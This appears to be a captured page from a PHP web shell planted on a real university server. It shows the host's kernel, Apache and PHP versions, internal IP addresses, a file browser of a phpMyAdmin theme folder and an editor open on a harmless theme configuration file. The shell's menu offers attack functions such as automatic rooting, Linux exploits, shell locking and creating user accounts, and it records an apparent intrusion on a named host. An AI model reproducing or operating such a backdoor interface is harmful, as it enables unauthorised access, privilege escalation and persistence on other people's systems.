Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
themes /
pmahomme /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
jquery
[ DIR ]
drwxrwxr-x
info.inc.php
374
B
-rwxrwxr-x
info.lib.php
218
B
-rwxrwxr-x
layout.inc.php
2.13
KB
-rwxrwxr-x
layout.lib.php
215
B
-rwxrwxr-x
screen.png
24.33
KB
-rwxrwxr-x
sprites.inc.php
379
B
-rwxrwxr-x
sprites.lib.php
18.62
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : layout.inc.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * configures general layout * for detailed layout configuration please refer to the css files * * @package PhpMyAdmin-theme * @subpackage PMAHomme */ /** * navi frame */ // navi frame width $GLOBALS['cfg']['NaviWidth'] = 240; // foreground (text) color for the navi frame $GLOBALS['cfg']['NaviColor'] = '#000'; // background for the navi frame $GLOBALS['cfg']['NaviBackground'] = '#f3f3f3'; // foreground (text) color of the pointer in navi frame $GLOBALS['cfg']['NaviPointerColor'] = '#000'; // background of the pointer in navi frame $GLOBALS['cfg']['NaviPointerBackground'] = '#ddd'; /** * main frame */ // foreground (text) color for the main frame $GLOBALS['cfg']['MainColor'] = '#444'; // background for the main frame $GLOBALS['cfg']['MainBackground'] = '#fff'; // foreground (text) color of the pointer in browse mode $GLOBALS['cfg']['BrowsePointerColor'] = '#000'; // background of the pointer in browse mode $GLOBALS['cfg']['BrowsePointerBackground'] = '#cfc'; // foreground (text) color of the marker (visually marks row by clicking on it) // in browse mode $GLOBALS['cfg']['BrowseMarkerColor'] = '#000'; // background of the marker (visually marks row by clicking on it) in browse mode $GLOBALS['cfg']['BrowseMarkerBackground'] = '#fc9'; /** * fonts */ /** * the font family as a valid css font family value, * if not set the browser default will be used * (depending on browser, DTD and system settings) */ $GLOBALS['cfg']['FontFamily'] = 'sans-serif'; /** * fixed width font family, used in textarea */ $GLOBALS['cfg']['FontFamilyFixed'] = 'monospace'; /** * tables */ // border $GLOBALS['cfg']['Border'] = 0; // table header and footer color $GLOBALS['cfg']['ThBackground'] = '#D3DCE3'; // table header and footer background $GLOBALS['cfg']['ThColor'] = '#000'; // table data row background $GLOBALS['cfg']['BgOne'] = '#E5E5E5'; // table data row background, alternate $GLOBALS['cfg']['BgTwo'] = '#D5D5D5';
Close